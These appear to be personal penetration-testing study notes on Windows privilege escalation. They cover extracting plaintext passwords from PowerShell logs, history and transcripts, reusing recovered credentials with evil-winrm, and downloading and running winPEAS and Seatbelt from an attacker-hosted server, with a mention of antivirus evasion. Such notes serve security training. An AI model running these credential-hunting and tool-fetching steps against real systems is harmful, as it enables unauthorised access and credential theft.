2026-06-02
Windows Local Enumeration — PowerShell Artifacts & Automated Tooling
Theme of the day: Windows local enumeration & privilege escalation via PowerShell logging artifacts and automated enumeration tooling.
> Methodology notes only — generic examples and placeholder names throughout. No specific target, account, or exercise details.
1. Script Block Logging via Event Viewer
When PowerShell Script Block Logging is enabled, it records the full text of executed script blocks — including any literal passwords or credentials that were typed.
- Log location:
Applications and Services Logs → Microsoft → Windows → PowerShell → Operational - Event ID 4104 = "Creating Scriptblock text" — contains the decoded script text.
- Workflow: Right-click log → Filter Current Log… → enter
4104→ then Find (Ctrl+F) forpassword,ConvertTo-SecureString,-AsPlainText,cred. - Filtering to 4104 first makes Find much faster (each event message is large).
- PowerShell equivalent:
Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational" |
Where-Object { $_.Id -eq 4104 -and $_.Message -match "pass" } |
Format-List TimeCreated, Message
Key takeaway: Defensive logging is an offensive goldmine. Script Block Logging records the original (decoded) representation of commands — even obfuscated/encoded ones.
2. PowerShell history & transcript hunting
Three artifact sources, fast → slow:
Get-History— PowerShell's own session history. Usually empty.Clear-Historywipes this.- PSReadline history file — THE reliable one.
Clear-Historydoes not touch it.
(Get-PSReadlineOption).HistorySavePath
type $((Get-PSReadlineOption).HistorySavePath)
Path: C:\Users\<user>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt Also check other users' profiles, not just your own.
- Transcript files ("over-the-shoulder" logging) — often in
C:\Users\Public\Transcripts\or a user home / network share. Frequently contains the plaintext password that the history only showed as aSecureStringvariable.
Key takeaway: Admins run Clear-History thinking they wiped everything — but PSReadline's ConsoleHost_history.txt survives. This is where the trail almost always starts. Never skip it.
A recovered password (e.g. a Set-Secret entry, or a ConvertTo-SecureString + New-Object PSCredential pair in a transcript) should be tried against every user/service — password reuse is common. Use evil-winrm -i <ip> -u <user> -p '<pass>' from Kali for a clean WinRM shell (escape ! as \!); a PSSession inside a bind shell behaves unreliably.
3. Automated enumeration: winPEAS
- Transfer: host on Kali (
python3 -m http.server 80), pull withiwr -uri http://<kali>/winPEASx64.exe -Outfile winPEAS.exe, run.\winPEAS.exe. - Output legend: Red = misconfig / special privilege; Green = protection enabled; Cyan = active users; Blue = disabled users; LightYellow = links.
- DPAPI Master Files: DPAPI encrypts user secrets (saved creds, Wi-Fi, RDP, browser). Master key files are GUID-named and live in:
C:\Users\<user>\AppData\Roaming\Microsoft\Protect\<SID>\C:\Users\<user>\AppData\Local\Microsoft\Protect\<SID>\- The GUID filename is the MasterKey. Ignore
Preferred,CREDHIST,BK-*.
Key takeaway: Automated tools save huge time but lie and miss things — they can mis-identify the OS version and skip artifacts (transcript files, PSReadline history, desktop notes) that manual enumeration finds. Use automation for breadth, but always back it with manual work. Never blindly trust tool output.
4. Automated enumeration: Seatbelt
- Precompiled binaries: r3motecontrol/Ghostpack-CompiledBinaries GitHub repo.
-group=allis very noisy. Two ways to tame it:- Redirect + search:
.\Seatbelt.exe -group=all > seatbelt.txt 2>&1thenSelect-String -Path seatbelt.txt -Pattern "<keyword>" -Context 5,15 - Run a single collector:
.\Seatbelt.exe InstalledProducts InstalledProductsis a quick way to pull installed-software names andDisplayVersionvalues.
Operational lessons:
- Always capture noisy tool output to a file (
> file.txt) — console scrollback is finite, and an un-captured run means re-running everything. - Seatbelt/winPEAS are known offensive tools and may be flagged by AV. Fallbacks: AV-evasion techniques, alternative tools (JAWS), or manual checks (e.g. an app's version from its install directory readme).
Cross-cutting themes
- Logging cuts both ways — the same telemetry defenders rely on (Script Block Logging, Transcription, PSReadline history) hands attackers plaintext secrets.
- Manual + automated, never one alone — tools give speed and breadth; manual enumeration catches what they miss and corrects what they get wrong.
- Password reuse — always re-test recovered creds across users/services/hosts.
- Capture your output — pipe long tool runs to files; it makes searching trivial and survives lost sessions.